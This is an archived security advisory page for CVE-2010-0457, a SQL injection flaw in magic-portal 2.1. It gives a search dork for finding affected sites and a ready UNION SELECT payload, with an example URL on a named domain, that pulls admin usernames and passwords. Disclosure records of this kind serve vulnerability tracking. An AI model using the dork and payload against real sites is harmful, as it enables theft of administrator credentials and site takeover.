|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home SecurityAlert Database |
|
|
Topic : | magic-portal 2.1 SQL injection Vulnerability
|
SecurityAlert : 6985
CVE : CVE-2010-0457
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : alnjm33
Published : 31.01.2010
Affected Software : | a3malnet:magic-portal:2.1 |
 Advisory Content :
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::
Exploit Title :magic-portal SQL injection Vulnerability
Author: alnjm33
Software Link:
Version: 2.1
Tested on: Version 2.1
My home : Sec-war.com
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::
==========================================Dork=============================
=============
( Powered by
magic-portal Version 2.1 )
================================Exploit====================================
=========
Site/Path/home.php?id=-2/**/union/**/select/**/1,concat(username_admin,0x3a
,password_admin),3,4/**/from/**/admin_log_cp--
e.g
http://www.a3malnet.org/magic-portal/home.php?id=-2/**/union/**/select/**/1
,concat(username_admin,0x3a,password_admin),3,4/**/from/**/admin_log_cp--
===========================================================================
============
Greetz to :PrEdAtOr -Sh0ot3R - xXx - Mu$L!m-h4ck3r - ahmadso - JaMbA -
RoOt_EgY- jago-dz - XR57 all Sec-War.com members
References :
http://xforce.iss.net/xforce/xfdb/55849
http://www.exploit-db.com/exploits/11235
http://packetstormsecurity.org/1001-exploits/magicportal-sql.txt
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|